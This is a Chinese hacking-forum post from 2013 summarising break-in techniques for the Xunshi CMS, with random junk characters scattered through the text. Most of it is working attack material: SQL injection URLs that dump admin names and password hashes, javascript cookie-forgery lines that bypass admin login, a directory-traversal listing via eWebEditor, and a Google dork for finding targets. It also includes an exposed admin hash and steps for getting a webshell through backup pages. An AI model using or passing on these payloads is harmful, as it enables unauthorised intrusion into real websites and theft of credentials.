找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2501|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘. e( r0 V6 i+ q. c
7 K+ W, O7 [, {+ B
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
; @: z+ v) d' w5 J/ Z9 v9 M: _) q
以下本文总结来自黑防去年第9期杂志上的内容...
8 j, P/ {$ J7 p0 G" w+ b4 ]. |
3 m  u( o' ^) A8 h' f* N先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
; |6 s; G- ~: X. v- l; S) I! G2 N; m
+ F1 J# X) P9 u26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
2 v/ N3 k$ i# U8 x0 E& d( w4 I' ]/ ~1 J% R9 k0 w- s
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况" i  E, ~; p. z+ U! S# B
这里一个注入
$ y0 V6 f! Z, q% f
/ P* ?" U' l5 i效果如图:
7 E5 U( w, f5 y+ o$ G( ^* |& j$ p- b
6 R/ {- W/ y3 T) u  [& H+ [

  j" R2 J9 S- [& X- L- I5 [7 |, Z0 `这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高./ N' \- E( E1 {* l9 L. `8 S

+ H! ~) f3 H+ w  V" J( e2 E密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去! t9 n2 A9 S& {* L0 @9 @6 E

) K8 W( E1 j# o% {/ e% q( M" ^javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));6 I# |, `$ s( U6 I
8 x2 ]; {  w) X- ~8 k/ m
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
: @" |! k: P& W# [  n: S$ F
. v4 K& R# u4 _5 u/ Q因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
3 N3 m2 z. `+ B# u
1 }* D" a6 @$ b. p( J它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以; _- ^, {) v6 A% \1 U; A
2 T: z# S5 k" Z  `2 I* m5 y; t3 y3 X
访问这页面来列目录..步骤如下:, r+ C( N; k& C

8 a3 D5 r: t5 w; f& E2 ?javascript:alert(document.cookie="admindj=1") # g  a- \% S' `

: p* ~' p  `$ u6 x0 Y! B& chttp://www.political-security.co ... asp?id=46&dir=../..
: A) ~8 H& @3 U1 A( @" q
7 {; x6 m! |' M; |- p3 C效果如图:
" |; i  C7 s, q% J" [- L2 q9 z8 J/ ]  j3 \; g" r6 ]

4 r( D2 ~! N: G& ^' l; \) j, |  e* p6 h
这样全站目录都能瞧了..找到后台目录..进去..
3 `. t1 X- ^- I0 U; o4 g6 ?6 t: h- ~1 m' C# A6 M
那么进了后台怎么拿shell??上传--备份就ok了..$ J+ O1 @6 w( m$ X

0 }9 ^, E) ~4 q# B$ j4 r: `* d那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
& V7 e2 `2 y. Q' f/ v6 E$ l) i" V) q3 ^. y6 l5 S5 J% |
这个我也碰到过一次..你都可以通过列目录来实现..6 S- _2 a7 c$ f

- f3 t" h' p1 R4 Y/ ]javascript:alert(document.cookie="admindj=1") ) Y9 G" U( Q- v' s# A
* U8 x) g( y8 R- k, {/ y. x
http://www.political-security.co ... p?action=BackupData 2 `; O: U" G" b/ p' I

$ d& X5 x' j6 i1 b6 \备份ok..2 l7 g: V) T/ U1 {0 g
' ?4 l7 ~9 ?5 l$ J6 T; ?3 K- W4 e
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?2 p3 t4 y1 X" z" U& S3 t
# D% s; r! ?* N3 T! d
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
+ p9 C* J4 A/ ]
' a  Y( H+ B" s/ B( \; N, C! _然后访问此页面进行注入..步骤如下:
6 i4 P5 E+ E* @/ i- g! K$ b
7 W9 {7 o' F; Ojavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
0 }+ ]$ E6 E6 B4 ]: \' q( e0 B2 b; n: c5 w
然后请求admin/admin_chk.asp页面% ?5 Q4 V+ V4 J& M5 o5 k7 y1 l
; t% X6 S" ]: i# h5 G+ U
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%: N) k) J/ C! X

" u: ~4 ^% E, w0 |& b8 a( m26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
! n; \/ R4 H) x- p5 `3 r# v* J# X: k: F
效果如图所示:' D0 g# d9 m. x; Y5 O$ t& Z

, D/ d/ ]( K) ^8 j" p5 M   }/ s9 E. a  t* G

2 L- T' F) k) J, Z0 _- g4 A; C8 L讯时漏洞2( [; {* v0 }6 G0 U5 B' Z3 Y
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
% w4 v. |8 C% L& Y# k# y+ [0 M1 } ; _! l+ D$ W5 H7 f8 S$ }  x: o  v9 J, n
1、/admin/admin_news_pl_view.asp?id=1
! O0 Q0 s; K. Q* m//id任意 填入以下语句
1 u( L7 f( _- ]* T. M
% ?" I4 O& R9 ?! l2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!: p- ~/ q+ }3 Q
: o6 y% J. s, ^! h5 b
; N2 X1 A6 M+ F" T
0 G& ?- P7 u( C2 y' q4 M
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
5 \% g2 S) \6 q4 O* z+ T0 j9 X 8 R! S; F8 R" c% D) \0 x

$ o0 g4 C6 H$ E6 v: Y( H. K0 u2 k) U& D
爆出管理员帐号和密码了3 Z0 F8 s2 F! s. I

/ E2 \: T8 v$ [6 S0 ^, T/ \$ x  H, X
+ B, E# t6 I% V7 g! S: I# R
' F& J* a% X. s0 f5 v7 D( g8 V4、cookies进后台
+ s8 c7 e3 w) R8 j : ^2 c& z. O2 a: p" Q  B
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));- G) J- p  \) b! G
1 c; B) o; s0 v4 q5 X) R
7 a9 t; m$ }' }6 ?

% v( q% g. [1 `* w- H- n# o+ j0 p5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
: v& p+ U. [$ r$ f - f) m5 w2 L5 x6 d8 b
1 l5 X5 }- b+ h# ~

, `/ E# a$ }; x, O" V0 z' q6、后台有上传和备份取SHELL不难。
+ I+ G) t, }# k0 S* y3 c2 \
/ T: `( x5 v. `/ w1 X7 q7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
& Q. Z5 Z- A$ i8 s* G* Y7 S+ n
1 Z" x; K" L4 |1 U5 `# [逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!! I+ e& y2 |3 I# T- A1 D3 x& t

7 Z5 D, P1 P5 y9 s9 V
6 n5 h3 ?- s' l5 a$ Z) s0 b# d: T$ q1 x! A* M* u$ m7 f; l) z' ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表